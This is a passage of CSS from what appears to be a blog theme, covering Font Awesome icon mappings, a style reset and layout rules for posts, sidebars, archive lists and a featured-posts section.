ock-alt:before{content:"\f13e"}.fa-bullseye:before{content:"\f140"}.fa-ellipsis-h:before{content:"\f141"}.fa-ellipsis-v:before{content:"\f142"}.fa-rss-square:before{content:"\f143"}.fa-play-circle:before{content:"\f144"}.fa-ticket:before{content:"\f145"}.fa-minus-square:before{content:"\f146"}.fa-minus-square-o:before{content:"\f147"}.fa-level-up:before{content:"\f148"}.fa-level-down:before{content:"\f149"}.fa-check-square:before{content:"\f14a"}.fa-pencil-square:before{content:"\f14b"}.fa-external-link-square:before{content:"\f14c"}.fa-share-square:before{content:"\f14d"}.fa-compass:before{content:"\f14e"}.fa-toggle-down:before,.fa-caret-square-o-down:before{content:"\f150"}.fa-toggle-up:before,.fa-caret-square-o-up:before{content:"\f151"}.fa-toggle-right:before,.fa-caret-square-o-right:before{content:"\f152"}.fa-euro:before,.fa-eur:before{content:"\f153"}.fa-gbp:before{content:"\f154"}.fa-dollar:before,.fa-usd:before{content:"\f155"}.fa-rupee:before,.fa-inr:before{content:"\f156"}.fa-cny:before,.fa-rmb:before,.fa-yen:before,.fa-jpy:before{content:"\f157"}.fa-ruble:before,.fa-rouble:before,.fa-rub:before{content:"\f158"}.fa-won:before,.fa-krw:before{content:"\f159"}.fa-bitcoin:before,.fa-btc:before{content:"\f15a"}.fa-file:before{content:"\f15b"}.fa-file-text:before{content:"\f15c"}.fa-sort-alpha-asc:before{content:"\f15d"}.fa-sort-alpha-desc:before{content:"\f15e"}.fa-sort-amount-asc:before{content:"\f160"}.fa-sort-amount-desc:before{content:"\f161"}.fa-sort-numeric-asc:before{content:"\f162"}.fa-sort-numeric-desc:before{content:"\f163"}.fa-thumbs-up:before{content:"\f164"}.fa-thumbs-down:before{content:"\f165"}.fa-youtube-square:before{content:"\f166"}.fa-youtube:before{content:"\f167"}.fa-xing:before{content:"\f168"}.fa-xing-square:before{content:"\f169"}.fa-youtube-play:before{content:"\f16a"}.fa-dropbox:before{content:"\f16b"}.fa-stack-overflow:before{content:"\f16c"}.fa-instagram:before{content:"\f16d"}.fa-flickr:before{content:"\f16e"}.fa-adn:before{content:"\f170"}.fa-bitbucket:before{content:"\f171"}.fa-bitbucket-square:before{content:"\f172"}.fa-tumblr:before{content:"\f173"}.fa-tumblr-square:before{content:"\f174"}.fa-long-arrow-down:before{content:"\f175"}.fa-long-arrow-up:before{content:"\f176"}.fa-long-arrow-left:before{content:"\f177"}.fa-long-arrow-right:before{content:"\f178"}.fa-apple:before{content:"\f179"}.fa-windows:before{content:"\f17a"}.fa-android:before{content:"\f17b"}.fa-linux:before{content:"\f17c"}.fa-dribbble:before{content:"\f17d"}.fa-skype:before{content:"\f17e"}.fa-foursquare:before{content:"\f180"}.fa-trello:before{content:"\f181"}.fa-female:before{content:"\f182"}.fa-male:before{content:"\f183"}.fa-gittip:before,.fa-gratipay:before{content:"\f184"}.fa-sun-o:before{content:"\f185"}.fa-moon-o:before{content:"\f186"}.fa-archive:before{content:"\f187"}.fa-bug:before{content:"\f188"}.fa-vk:before{content:"\f189"}.fa-weibo:before{content:"\f18a"}.fa-renren:before{content:"\f18b"}.fa-pagelines:before{content:"\f18c"}.fa-stack-exchange:before{content:"\f18d"}.fa-arrow-circle-o-right:before{content:"\f18e"}.fa-arrow-circle-o-left:before{content:"\f190"}.fa-toggle-left:before,.fa-caret-square-o-left:before{content:"\f191"}.fa-dot-circle-o:before{content:"\f192"}.fa-wheelchair:before{content:"\f193"}.fa-vimeo-square:before{content:"\f194"}.fa-turkish-lira:before,.fa-try:before{content:"\f195"}.fa-plus-square-o:before{content:"\f196"}.fa-space-shuttle:before{content:"\f197"}.fa-slack:before{content:"\f198"}.fa-envelope-square:before{content:"\f199"}.fa-wordpress:before{content:"\f19a"}.fa-openid:before{content:"\f19b"}.fa-institution:before,.fa-bank:before,.fa-university:before{content:"\f19c"}.fa-mortar-board:before,.fa-graduation-cap:before{content:"\f19d"}.fa-yahoo:before{content:"\f19e"}.fa-google:before{content:"\f1a0"}.fa-reddit:before{content:"\f1a1"}.fa-reddit-square:before{content:"\f1a2"}.fa-stumbleupon-circle:before{content:"\f1a3"}.fa-stumbleupon:before{content:"\f1a4"}.fa-delicious:before{content:"\f1a5"}.fa-digg:before{content:"\f1a6"}.fa-pied-piper-pp:before{content:"\f1a7"}.fa-pied-piper-alt:before{content:"\f1a8"}.fa-drupal:before{content:"\f1a9"}.fa-joomla:before{content:"\f1aa"}.fa-language:before{content:"\f1ab"}.fa-fax:before{content:"\f1ac"}.fa-building:before{content:"\f1ad"}.fa-child:before{content:"\f1ae"}.fa-paw:before{content:"\f1b0"}.fa-spoon:before{content:"\f1b1"}.fa-cube:before{content:"\f1b2"}.fa-cubes:before{content:"\f1b3"}.fa-behance:before{content:"\f1b4"}.fa-behance-square:before{content:"\f1b5"}.fa-steam:before{content:"\f1b6"}.fa-steam-square:before{content:"\f1b7"}.fa-recycle:before{content:"\f1b8"}.fa-automobile:before,.fa-car:before{content:"\f1b9"}.fa-cab:before,.fa-taxi:before{content:"\f1ba"}.fa-tree:before{content:"\f1bb"}.fa-spotify:before{content:"\f1bc"}.fa-deviantart:before{content:"\f1bd"}.fa-soundcloud:before{content:"\f1be"}.fa-database:before{content:"\f1c0"}.fa-file-pdf-o:before{content:"\f1c1"}.fa-file-word-o:before{content:"\f1c2"}.fa-file-excel-o:before{content:"\f1c3"}.fa-file-powerpoint-o:before{content:"\f1c4"}.fa-file-photo-o:before,.fa-file-picture-o:before,.fa-file-image-o:before{content:"\f1c5"}.fa-file-zip-o:before,.fa-file-archive-o:before{content:"\f1c6"}.fa-file-sound-o:before,.fa-file-audio-o:before{content:"\f1c7"}.fa-file-movie-o:before,.fa-file-video-o:before{content:"\f1c8"}.fa-file-code-o:before{content:"\f1c9"}.fa-vine:before{content:"\f1ca"}.fa-codepen:before{content:"\f1cb"}.fa-jsfiddle:before{content:"\f1cc"}.fa-life-bouy:before,.fa-life-buoy:before,.fa-life-saver:before,.fa-support:before,.fa-life-ring:before{content:"\f1cd"}.fa-circle-o-notch:before{content:"\f1ce"}.fa-ra:before,.fa-resistance:before,.fa-rebel:before{content:"\f1d0"}.fa-ge:before,.fa-empire:before{content:"\f1d1"}.fa-git-square:before{content:"\f1d2"}.fa-git:before{content:"\f1d3"}.fa-y-combinator-square:before,.fa-yc-square:before,.fa-hacker-news:before{content:"\f1d4"}.fa-tencent-weibo:before{content:"\f1d5"}.fa-qq:before{content:"\f1d6"}.fa-wechat:before,.fa-weixin:before{content:"\f1d7"}.fa-send:before,.fa-paper-plane:before{content:"\f1d8"}.fa-send-o:before,.fa-paper-plane-o:before{content:"\f1d9"}.fa-history:before{content:"\f1da"}.fa-circle-thin:before{content:"\f1db"}.fa-header:before{content:"\f1dc"}.fa-paragraph:before{content:"\f1dd"}.fa-sliders:before{content:"\f1de"}.fa-share-alt:before{content:"\f1e0"}.fa-share-alt-square:before{content:"\f1e1"}.fa-bomb:before{content:"\f1e2"}.fa-soccer-ball-o:before,.fa-futbol-o:before{content:"\f1e3"}.fa-tty:before{content:"\f1e4"}.fa-binoculars:before{content:"\f1e5"}.fa-plug:before{content:"\f1e6"}.fa-slideshare:before{content:"\f1e7"}.fa-twitch:before{content:"\f1e8"}.fa-yelp:before{content:"\f1e9"}.fa-newspaper-o:before{content:"\f1ea"}.fa-wifi:before{content:"\f1eb"}.fa-calculator:before{content:"\f1ec"}.fa-paypal:before{content:"\f1ed"}.fa-google-wallet:before{content:"\f1ee"}.fa-cc-visa:before{content:"\f1f0"}.fa-cc-mastercard:before{content:"\f1f1"}.fa-cc-discover:before{content:"\f1f2"}.fa-cc-amex:before{content:"\f1f3"}.fa-cc-paypal:before{content:"\f1f4"}.fa-cc-stripe:before{content:"\f1f5"}.fa-bell-slash:before{content:"\f1f6"}.fa-bell-slash-o:before{content:"\f1f7"}.fa-trash:before{content:"\f1f8"}.fa-copyright:before{content:"\f1f9"}.fa-at:before{content:"\f1fa"}.fa-eyedropper:before{content:"\f1fb"}.fa-paint-brush:before{content:"\f1fc"}.fa-birthday-cake:before{content:"\f1fd"}.fa-area-chart:before{content:"\f1fe"}.fa-pie-chart:before{content:"\f200"}.fa-line-chart:before{content:"\f201"}.fa-lastfm:before{content:"\f202"}.fa-lastfm-square:before{content:"\f203"}.fa-toggle-off:before{content:"\f204"}.fa-toggle-on:before{content:"\f205"}.fa-bicycle:before{content:"\f206"}.fa-bus:before{content:"\f207"}.fa-ioxhost:before{content:"\f208"}.fa-angellist:before{content:"\f209"}.fa-cc:before{content:"\f20a"}.fa-shekel:before,.fa-sheqel:before,.fa-ils:before{content:"\f20b"}.fa-meanpath:before{content:"\f20c"}.fa-buysellads:before{content:"\f20d"}.fa-connectdevelop:before{content:"\f20e"}.fa-dashcube:before{content:"\f210"}.fa-forumbee:before{content:"\f211"}.fa-leanpub:before{content:"\f212"}.fa-sellsy:before{content:"\f213"}.fa-shirtsinbulk:before{content:"\f214"}.fa-simplybuilt:before{content:"\f215"}.fa-skyatlas:before{content:"\f216"}.fa-cart-plus:before{content:"\f217"}.fa-cart-arrow-down:before{content:"\f218"}.fa-diamond:before{content:"\f219"}.fa-ship:before{content:"\f21a"}.fa-user-secret:before{content:"\f21b"}.fa-motorcycle:before{content:"\f21c"}.fa-street-view:before{content:"\f21d"}.fa-heartbeat:before{content:"\f21e"}.fa-venus:before{content:"\f221"}.fa-mars:before{content:"\f222"}.fa-mercury:before{content:"\f223"}.fa-intersex:before,.fa-transgender:before{content:"\f224"}.fa-transgender-alt:before{content:"\f225"}.fa-venus-double:before{content:"\f226"}.fa-mars-double:before{content:"\f227"}.fa-venus-mars:before{content:"\f228"}.fa-mars-stroke:before{content:"\f229"}.fa-mars-stroke-v:before{content:"\f22a"}.fa-mars-stroke-h:before{content:"\f22b"}.fa-neuter:before{content:"\f22c"}.fa-genderless:before{content:"\f22d"}.fa-facebook-official:before{content:"\f230"}.fa-pinterest-p:before{content:"\f231"}.fa-whatsapp:before{content:"\f232"}.fa-server:before{content:"\f233"}.fa-user-plus:before{content:"\f234"}.fa-user-times:before{content:"\f235"}.fa-hotel:before,.fa-bed:before{content:"\f236"}.fa-viacoin:before{content:"\f237"}.fa-train:before{content:"\f238"}.fa-subway:before{content:"\f239"}.fa-medium:before{content:"\f23a"}.fa-yc:before,.fa-y-combinator:before{content:"\f23b"}.fa-optin-monster:before{content:"\f23c"}.fa-opencart:before{content:"\f23d"}.fa-expeditedssl:before{content:"\f23e"}.fa-battery-4:before,.fa-battery:before,.fa-battery-full:before{content:"\f240"}.fa-battery-3:before,.fa-battery-three-quarters:before{content:"\f241"}.fa-battery-2:before,.fa-battery-half:before{content:"\f242"}.fa-battery-1:before,.fa-battery-quarter:before{content:"\f243"}.fa-battery-0:before,.fa-battery-empty:before{content:"\f244"}.fa-mouse-pointer:before{content:"\f245"}.fa-i-cursor:before{content:"\f246"}.fa-object-group:before{content:"\f247"}.fa-object-ungroup:before{content:"\f248"}.fa-sticky-note:before{content:"\f249"}.fa-sticky-note-o:before{content:"\f24a"}.fa-cc-jcb:before{content:"\f24b"}.fa-cc-diners-club:before{content:"\f24c"}.fa-clone:before{content:"\f24d"}.fa-balance-scale:before{content:"\f24e"}.fa-hourglass-o:before{content:"\f250"}.fa-hourglass-1:before,.fa-hourglass-start:before{content:"\f251"}.fa-hourglass-2:before,.fa-hourglass-half:before{content:"\f252"}.fa-hourglass-3:before,.fa-hourglass-end:before{content:"\f253"}.fa-hourglass:before{content:"\f254"}.fa-hand-grab-o:before,.fa-hand-rock-o:before{content:"\f255"}.fa-hand-stop-o:before,.fa-hand-paper-o:before{content:"\f256"}.fa-hand-scissors-o:before{content:"\f257"}.fa-hand-lizard-o:before{content:"\f258"}.fa-hand-spock-o:before{content:"\f259"}.fa-hand-pointer-o:before{content:"\f25a"}.fa-hand-peace-o:before{content:"\f25b"}.fa-trademark:before{content:"\f25c"}.fa-registered:before{content:"\f25d"}.fa-creative-commons:before{content:"\f25e"}.fa-gg:before{content:"\f260"}.fa-gg-circle:before{content:"\f261"}.fa-tripadvisor:before{content:"\f262"}.fa-odnoklassniki:before{content:"\f263"}.fa-odnoklassniki-square:before{content:"\f264"}.fa-get-pocket:before{content:"\f265"}.fa-wikipedia-w:before{content:"\f266"}.fa-safari:before{content:"\f267"}.fa-chrome:before{content:"\f268"}.fa-firefox:before{content:"\f269"}.fa-opera:before{content:"\f26a"}.fa-internet-explorer:before{content:"\f26b"}.fa-tv:before,.fa-television:before{content:"\f26c"}.fa-contao:before{content:"\f26d"}.fa-500px:before{content:"\f26e"}.fa-amazon:before{content:"\f270"}.fa-calendar-plus-o:before{content:"\f271"}.fa-calendar-minus-o:before{content:"\f272"}.fa-calendar-times-o:before{content:"\f273"}.fa-calendar-check-o:before{content:"\f274"}.fa-industry:before{content:"\f275"}.fa-map-pin:before{content:"\f276"}.fa-map-signs:before{content:"\f277"}.fa-map-o:before{content:"\f278"}.fa-map:before{content:"\f279"}.fa-commenting:before{content:"\f27a"}.fa-commenting-o:before{content:"\f27b"}.fa-houzz:before{content:"\f27c"}.fa-vimeo:before{content:"\f27d"}.fa-black-tie:before{content:"\f27e"}.fa-fonticons:before{content:"\f280"}.fa-reddit-alien:before{content:"\f281"}.fa-edge:before{content:"\f282"}.fa-credit-card-alt:before{content:"\f283"}.fa-codiepie:before{content:"\f284"}.fa-modx:before{content:"\f285"}.fa-fort-awesome:before{content:"\f286"}.fa-usb:before{content:"\f287"}.fa-product-hunt:before{content:"\f288"}.fa-mixcloud:before{content:"\f289"}.fa-scribd:before{content:"\f28a"}.fa-pause-circle:before{content:"\f28b"}.fa-pause-circle-o:before{content:"\f28c"}.fa-stop-circle:before{content:"\f28d"}.fa-stop-circle-o:before{content:"\f28e"}.fa-shopping-bag:before{content:"\f290"}.fa-shopping-basket:before{content:"\f291"}.fa-hashtag:before{content:"\f292"}.fa-bluetooth:before{content:"\f293"}.fa-bluetooth-b:before{content:"\f294"}.fa-percent:before{content:"\f295"}.fa-gitlab:before{content:"\f296"}.fa-wpbeginner:before{content:"\f297"}.fa-wpforms:before{content:"\f298"}.fa-envira:before{content:"\f299"}.fa-universal-access:before{content:"\f29a"}.fa-wheelchair-alt:before{content:"\f29b"}.fa-question-circle-o:before{content:"\f29c"}.fa-blind:before{content:"\f29d"}.fa-audio-description:before{content:"\f29e"}.fa-volume-control-phone:before{content:"\f2a0"}.fa-braille:before{content:"\f2a1"}.fa-assistive-listening-systems:before{content:"\f2a2"}.fa-asl-interpreting:before,.fa-american-sign-language-interpreting:before{content:"\f2a3"}.fa-deafness:before,.fa-hard-of-hearing:before,.fa-deaf:before{content:"\f2a4"}.fa-glide:before{content:"\f2a5"}.fa-glide-g:before{content:"\f2a6"}.fa-signing:before,.fa-sign-language:before{content:"\f2a7"}.fa-low-vision:before{content:"\f2a8"}.fa-viadeo:before{content:"\f2a9"}.fa-viadeo-square:before{content:"\f2aa"}.fa-snapchat:before{content:"\f2ab"}.fa-snapchat-ghost:before{content:"\f2ac"}.fa-snapchat-square:before{content:"\f2ad"}.fa-pied-piper:before{content:"\f2ae"}.fa-first-order:before{content:"\f2b0"}.fa-yoast:before{content:"\f2b1"}.fa-themeisle:before{content:"\f2b2"}.fa-google-plus-circle:before,.fa-google-plus-official:before{content:"\f2b3"}.fa-fa:before,.fa-font-awesome:before{content:"\f2b4"}.fa-handshake-o:before{content:"\f2b5"}.fa-envelope-open:before{content:"\f2b6"}.fa-envelope-open-o:before{content:"\f2b7"}.fa-linode:before{content:"\f2b8"}.fa-address-book:before{content:"\f2b9"}.fa-address-book-o:before{content:"\f2ba"}.fa-vcard:before,.fa-address-card:before{content:"\f2bb"}.fa-vcard-o:before,.fa-address-card-o:before{content:"\f2bc"}.fa-user-circle:before{content:"\f2bd"}.fa-user-circle-o:before{content:"\f2be"}.fa-user-o:before{content:"\f2c0"}.fa-id-badge:before{content:"\f2c1"}.fa-drivers-license:before,.fa-id-card:before{content:"\f2c2"}.fa-drivers-license-o:before,.fa-id-card-o:before{content:"\f2c3"}.fa-quora:before{content:"\f2c4"}.fa-free-code-camp:before{content:"\f2c5"}.fa-telegram:before{content:"\f2c6"}.fa-thermometer-4:before,.fa-thermometer:before,.fa-thermometer-full:before{content:"\f2c7"}.fa-thermometer-3:before,.fa-thermometer-three-quarters:before{content:"\f2c8"}.fa-thermometer-2:before,.fa-thermometer-half:before{content:"\f2c9"}.fa-thermometer-1:before,.fa-thermometer-quarter:before{content:"\f2ca"}.fa-thermometer-0:before,.fa-thermometer-empty:before{content:"\f2cb"}.fa-shower:before{content:"\f2cc"}.fa-bathtub:before,.fa-s15:before,.fa-bath:before{content:"\f2cd"}.fa-podcast:before{content:"\f2ce"}.fa-window-maximize:before{content:"\f2d0"}.fa-window-minimize:before{content:"\f2d1"}.fa-window-restore:before{content:"\f2d2"}.fa-times-rectangle:before,.fa-window-close:before{content:"\f2d3"}.fa-times-rectangle-o:before,.fa-window-close-o:before{content:"\f2d4"}.fa-bandcamp:before{content:"\f2d5"}.fa-grav:before{content:"\f2d6"}.fa-etsy:before{content:"\f2d7"}.fa-imdb:before{content:"\f2d8"}.fa-ravelry:before{content:"\f2d9"}.fa-eercast:before{content:"\f2da"}.fa-microchip:before{content:"\f2db"}.fa-snowflake-o:before{content:"\f2dc"}.fa-superpowers:before{content:"\f2dd"}.fa-wpexplorer:before{content:"\f2de"}.fa-meetup:before{content:"\f2e0"}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0, 0, 0, 0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}
article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}
body{line-height:1;display:block}
*{margin:0;padding:0}
html{display:block}
ol,ul{list-style:none}
blockquote,q{quotes:none}
blockquote:before,blockquote:after,q:before,q:after{background:transparent}
table{border-collapse:collapse;border-spacing:0}
*,:after,:before{-webkit-box-sizing:border-box;box-sizing:border-box}
.navbar,.post-feeds,.feed-links{display:none}
.section,.widget{margin:0;padding:0}
strong,b{font-weight:700;padding:0}
cite,em,i{font-style:italic}
a:link{;text-decoration:none;outline:none;transition:all .25s}
a:visited{color:#404040;text-decoration:none}
a:link:hover{color:(main.color);text-decoration:none}
a:visited:hover{color:#f17c72;text-decoration:none}
a img{border:none;border-width:0;outline:none}
img{max-width:100%;vertical-align:middle;border:0}
abbr,acronym{border-bottom:1px dotted;cursor:help}
sup,sub{vertical-align:baseline;position:relative;top:-.4em;font-size:86%}
sub{top:.4em}
small{font-size:86%}
kbd{display:inline-block;border:1px solid #ddd;border-radius:3px;padding:.2em .5em;margin:0 .2em;transition:all .3s}
kbd:hover{border-color:#aaa;color:#404040}
p,blockquote,pre,table,figure,hr,form,ol,ul,dl{margin:1.5em 0}
hr{height:1px;border:none;background-color:#99acb6}
h1, h2, h3, h4, h5, h6 { font-family:'Poppins', sans-serif; font-weight: 800; font-style: normal;}
h1{font-size:200%}
h2{font-size:180%}
h3{font-size:160%}
h4{font-size:140%}
h5{font-size:120%}
h6{font-size:100%}
input,button,select,textarea{font-size:100%;line-height:normal;vertical-align:baseline}
textarea{display:block;box-sizing:border-box}
pre,code{font-family:''Poppins', sans-serif';color:#444}
pre{white-space:pre;word-wrap:normal;overflow:auto}
blockquote{position:relative;line-height:24px;margin:15px 0;border-left:3px solid #ccc;font-weight:400;padding:0 18px}
:focus{outline:0!important}
ul,dl{margin:.5em 0 .5em 3em}
ol{list-style:decimal outside}
ul{list-style:disc outside}
li{margin:.5em 0}
dt{font-weight:700}
dd{margin:0 0 .5em 2em}
.post ul li span{position:relative;display:block;margin:0;padding:5px 8px;margin-bottom:10px;text-decoration:none;transition:all .3s ease-out}
ol{counter-reset:li;list-style:none;font:15px 'Poppins', sans-serif;padding:0;margin-bottom:4em;text-shadow:0 1px 0 rgba(255,255,255,.5)}
ol ol{margin:0 0 0 2em}
.post ol li{position:relative;display:block;padding:.4em .4em .4em .8em;margin:.5em 0 .5em 2.5em;background:#fff;color:#444;text-decoration:none;transition:all .3s ease-out}
.post ol li:before{content:counter(li);counter-increment:li;position:absolute;left:-2.5em;top:50%;margin-top:-1em;height:2em;width:2em;line-height:2em;text-align:center}
.post-body table td,.post-body table caption{padding:10px;text-align:left;vertical-align:top}
.post-body table th{padding:10px;text-align:left;vertical-align:top}
.post-body table.tr-caption-container{border:1px solid #eee}
.post-body th{font-weight:700}
.post-body table caption{border:none;font-style:italic}
.post-body td,.post-body th{vertical-align:top;text-align:left;padding:3px 5px;border:1px solid #eee}
.post-body td:hover{background:#fefefe}
.post-body th{background:#fafafa}
.post-body th:hover{background:#fdfdfd}
.post-body table.tr-caption-container td{border:none;padding:8px}
.post-body table.tr-caption-container,.post-body table.tr-caption-container img,.post-body img{max-width:100%;height:auto}
.post-body td.tr-caption{color:#444;font-size:80%;padding:0 8px 8px!important}
.post-body li{list-style-type:square}
img{max-width:100%;height:auto;border:none}
table{max-width:100%;width:100%;margin:1.5em auto}
table.section-columns td.first.columns-cell{border-left:none}
table.section-columns{border:none;table-layout:fixed;width:100%;position:relative}
table.columns-2 td.columns-cell{width:50%}
table.columns-3 td.columns-cell{width:33.33%}
table.columns-4 td.columns-cell{width:25%}
table.section-columns td.columns-cell{vertical-align:top}
table.tr-caption-container{padding:4px;margin-bottom:.5em}
td.tr-caption{font-size:80%}
.widget ul{padding:0}
body{background:#f9f9f9;margin:0;padding:0;color:#404040;font-family:'Poppins', sans-serif;font-weight:400;font-size:16px;text-align:left;}
.clear{clear:both}
.clear:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}
#navbar-iframe{display:none!important}
header,nav,section,aside,article,footer{display:block}
form.searchform{margin:0}
#post-wrapper{float:left;width:70%;margin:auto;margin-bottom: 10px;}
#header{float: left; width:250px; color: #46515e; margin: 0;height:85px;}
#footer-section{text-align:left;overflow:hidden;margin:0}
.footer{padding-bottom:.2em}
#header-wrapper{width: 1150px; margin: 0 auto; height: 85px;background: #fff;}
#main-header {background:#fff;width:100%;border-bottom:1px solid #eee;}
.quickedit {display:none!important;}
.FollowByEmail .follow-by-email-inner .follow-by-email-address{height:60px!important;border:none;padding:5px;margin-bottom:5px;background:#ddd;text-align:center;font-size:15px;font-family:'Poppins', sans-serif;}
.FollowByEmail .follow-by-email-inner .follow-by-email-submit{font-family:'Poppins', sans-serif;height:50px!important;width:100%;margin-left:0;background:$(main.color);font-size:16px;font-weight:800;text-transform:uppercase;padding:10px;border-radius:0!important;}
#footer2{max-width:600px;margin:auto;}
.followbytext{font-size:15px;color:white;text-align:center;font-weight:700}
.box-title10 {text-align: center;}
.box-title10 a, #blog-pager-newer-link a, #blog-pager-older-link a {padding: 8px 15px; background:$(main.color); color: #fff; font-size: 14px; font-weight: 600; border-radius: 5px;}
.box-title10 a:hover {color:#fff;}
::-webkit-scrollbar{width:3px;height:8px;border-radius:10px}
::-webkit-scrollbar-track{background-color:rgba(0,0,0,.1);border-radius:10px}
::-webkit-scrollbar-thumb:hover{background-color:rgba(0,0,0,.6)}
::-webkit-scrollbar-thumb{border-radius:2px;background-color:$(main.color);transition:all 400ms ease-in-out;border-radius:10px}
.follow-by-email-inner form {margin:0}
.Label li:hover:before {margin:0 0 0 5px;padding-right:4px;color:$(main.color);}
.status-msg-wrap {color:#fff;}
.status-msg-wrap a {display:none;}
.status-msg-border {border:none;}
#ArchiveList a.post-count-link, #ArchiveList a.post-count-link:link, #ArchiveList a.post-count-link:visited {text-decoration:none;font-size:13px;font-weight:700;}
span.post-count {font-size:11px;font-weight:700;}
.BlogArchive #ArchiveList ul.posts li {font-size:12px;}
#ArchiveList {padding: 10px;}
#ArchiveList select {width: 100%;padding: 15px;margin-bottom: 5px;border: 1px solid rgba(201, 201, 201, 0.52);font-size:13px;}
#nav, .menu-nav li ul {background: #fff;}
.menu-nav li li a:hover {color:$(main.color);}
.menu-nav > li > a.active {color:$(main.color);}
.menu-nav > li:hover > a, .menu-nav > li > a.active:hover { color:$(main.color); }
#related-post h5 span, #comments h4, .sidebar h3, .sidebar h2, .most-viewed2 .widget h2 {font-family: 'Poppins'; font-size: 14px;line-height: 18px; font-weight: 700; color: #111;}
.viewall {overflow: hidden; position: absolute; top: 0; right: 0; font-size: 12px; box-shadow: 0 2px 8px rgba(0,0,0,0.05); transition: all .4s ease-in-out;}
.viewall a {font-family: Poppins; border: 1px solid $(main.color);color: #ffffff; padding:8px 15px; display: -webkit-box; font-weight: 600; border-radius: 4px; overflow: hidden; background:$(main.color);}
.viewall a:hover {background: $(main.color);border:1px solid $(main.color);color:#fff;}
.share-box{background:$(main.color);color:#fff;padding: 8px; float: left; margin-right: 5px; font-weight: 600; font-size: 14px;}
.status-msg-body {background: #f9f9f9; color: #333;}
#recent1 .title {font-size: 22px; color: #333; position: relative; font-weight: 600; margin-top: 20px;}
#recent1 .title p {display: initial; font-size: 12px; margin: 0;}
#recent1 .title a{color: #444;padding-right: 10px;}
#recent1 { width: 100%;overflow: hidden;}
font-size: 14px; font-weight: 600; margin: 0 12px 8px 0; display: -webkit-box; -webkit-line-clamp: 2; -webkit-box-orient: vertical; overflow: hidden; text-overflow: ellipsis; color: #444; font-family: Poppins; height: 20px;
.ftimg {height: auto; width: 90px; display: block; overflow: hidden; position: absolute; margin:0 0 0 253px;}
.recent-box .imageContainer {width:100%;overflow: hidden;overflow:hidden;background: #2f3238;}
#recent1 .recent-box .imageContainer { margin-left: 0; }
.imageContainer {float: none;width: 100%;transition: 0.9s; -webkit-transition: opacity 0.35s, -webkit-transform 0.35s; transition: opacity 0.35s, transform 0.35s;}
img.label_thumb:hover, .post-image img:hover { opacity: 0.4; -webkit-transform: scale3d(1.1,1.1,1); transform: scale3d(1.1,1.1,1); }
.inline-ad {margin:0!important;}
.label_thumb {margin-left:0;transform: scale(1.0); transition: 0.9s;}
.label_title {display: block; font-size: 17px; font-weight: 700; line-height: 1.4;}
.label_title:hover {color: $(main.color)}
#label_with_thumbs .post-date {margin-right: 10px;}
.post-date {font-size: 10px; font-weight: 500; display: inline-block; text-transform: uppercase;color:#fff;margin-right: 10px;}
.post-date:before {content: "\f044";font-family: FontAwesome;display: inline-block;margin-right: 3px;color:#fff;}
.recent-com {font-size: 11px; color: #555; margin-right: 8px; font-weight: 500;}
.recent-com:before {content:"\f0e5";font-family: FontAwesome;display: inline-block;margin-right: 3px;color:#fff;}
.post-summary {padding-top:0;text-align:justify}
img.label_thumb {transition: 0.9s;-webkit-transition: opacity 1s, -webkit-transform 1s; transition: opacity 1s, transform 1s; -webkit-backface-visibility: hidden; backface-visibility: hidden;overflow: hidden; width: 100%;height:360px;}
img.recent_thumb {width:280px;height:200px;float:left;margin-bottom:5px;transition: 0.9s; margin-right: 10px;}
ul.recent_posts_with_thumbs {padding:0}
.recent_posts_with_thumbs {float: left;width: 100%;min-height: 100%;margin: 5px 0px 5px 0px;padding: 0;font-size:12px;}
ul.recent_posts_with_thumbs li {padding-bottom:5px;padding-top:5px;min-height:80px;border-bottom: 1px solid rgba(192, 192, 192, 0.38); margin-bottom: 10px;}
ul.recent_posts_with_thumbs li:last-child {border-bottom:none;}
ul.recent_posts_with_thumbs li p {margin: 0.3em 0; font-size: 11px;}
.recent_posts_with_thumbs a {text-decoration:none;font-size: 13px; font-weight:700; color: #333;}
.recent_posts_with_thumbs strong {font-size:10px;}
.recent-com {}
#label_with_thumbs li{background: #fff; margin: 0; width:23.66%; height:auto; float: left; overflow: hidden; display: block; margin-bottom:30px; margin-right: 20px;position: relative;box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.22); border-radius: 7px;padding:0}
#label_with_thumbs {margin-top:20px;padding: 0;position: relative;}
.label_thumb{position:relative;max-width:none;margin-left:0;transform:scale(1.0);transition:.9s}
.toe{overflow:hidden;display:block;margin-bottom:5px;}
.post-summary{line-height:18px;margin: 0; font-size: 13px; color: #333;overflow: hidden; display: initial;}
.ro{margin-bottom:15px;overflow:hidden}
#label_with_thumbs li:last-child{margin-right:0}
#featured-wrapper {background:linear-gradient(102deg, #9D1B55, #D9595B);padding: 30px;padding-top: 10px;height:505px;}
#featured-wrapper .bg {}
.featured-post{overflow:hidden;position:relative;width: 1150px; margin: 0 auto;}
.featured-post h2 {color:#fff;font-size: 26px; text-transform: uppercase; padding-bottom: 10px; line-height: 45px; font-weight: 700; letter-spacing: 1px;text-align:center;}
.heading-underline { background:#fff; height: 1px; margin: 0 auto; max-width: 150px; position: relative; }
.heading-underline:before { background:#fff; content: ""; height: 1px; left: 0; margin: 0 auto; position: absolute; right: 0; top: -5px; width: 75px; }
.heading-underline:after { background:#fff; content: ""; height: 1px; left: 0; margin: 0 auto; position: absolute; right: 0; bottom: -5px; width: 75px; }
.info {position: absolute; bottom: 0; left: 0; width: 100%; height: 160px; padding: 10px 10px 0; opacity: 1; transition: all .3s; background: #000; background: -webkit-linear-gradient(to bottom,rgba(0,0,0,0) 40%,#ff0e1f 100%); background: linear-gradient(to bottom,rgba(0,0,0,0) 40%,#000000 100%);}
.info:hover {opacity:.9;}
